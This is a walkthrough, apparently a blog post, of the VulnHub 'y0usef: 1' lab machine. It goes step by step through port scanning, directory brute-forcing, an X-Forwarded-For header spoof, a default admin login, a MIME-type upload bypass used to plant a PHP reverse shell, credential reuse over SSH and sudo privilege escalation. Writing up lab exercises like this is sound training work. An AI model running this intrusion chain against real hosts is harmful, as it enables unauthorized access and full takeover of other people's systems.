y0usef Walkthrough

Box Info

官网在这里:[y0usef: 1](y0usef: 1 ~ VulnHub)

image-20250329154643794

The Hack

先对目标主机做端口发现

sudo nmap -p- 172.16.33.74

目标主机开放 22、80 端口

image-20250329150831393

对开放的端口进行应用版本发现

sudo nmap -p22,80 -A -T4 172.16.33.74

22 端口开放 SSH 服务,80 端口开放 http 服务

image-20250329150903703

先来看 22 端口,尝试弱口令登陆,同时看看能不能泄露机密信息

ssh root@172.16.33.74

可惜失败了,再来看 80 端口,进行目录扫描

dirsearch -u http://172.16.33.74

发现 /adminstration 目录

image-20250329151251819

对 /adminstration 目录进一步扫描

dirsearch -u http://172.16.33.74/adminstration

发现了很多目录,但是除了 /adminstration/include/ 都是 404

image-20250329151833451

访问 /adminstration/include ,发现两个文件,访问文件没有报错或者禁止访问,但是没有内容

尝试添加 XFF 头指向 localhost 在进行访问,发现 /adminstration 页面变化为登陆界面,弱口令 admin/admin 即可进入后台

image-20250329152223913

上传文件,为 MIME 类型检测,将 PHP 木马的 Content-Type 更改为 image/jpg 即可上传成功

image-20250329152351345

访问上传的文件 /adminstration/upload/files/1668608420php-reverse-shell.php ,同时开启 nc 监听,即可接收到回弹的 shell

image-20250329152620389

获得 TTY shell

python3 -c "import pty;pty.spawn('/bin/bash')"

查看已登录用户

cat /etc/passwd | grep bash

切换至 home 目录,查看有哪些用户主目录可以访问,却发现 user.txt

··image-20250329153005316

查看 user.txt 发现是加密后数据,解密后为

ssh : 
user : yousef
pass : yousef123

使用 SSH 远程登陆 yousef 账户

ssh yousef@172.16.33.74

image-20250329153710818

查看有哪些文件具有 SUID 权限

find / -perm -u=s -type f 2>/dev/null

发现 sudo 竟然有 SUID 权限,由于先前知道 yousef 的 SSH 密码,是否存在密码复用?

image-20250329153937600

尝试使用 sudo 提权

sudo sudo /bin/sh

输入密码 yousef123,竟然成功了

image-20250329154038217

直接获得 flag

image-20250329154135436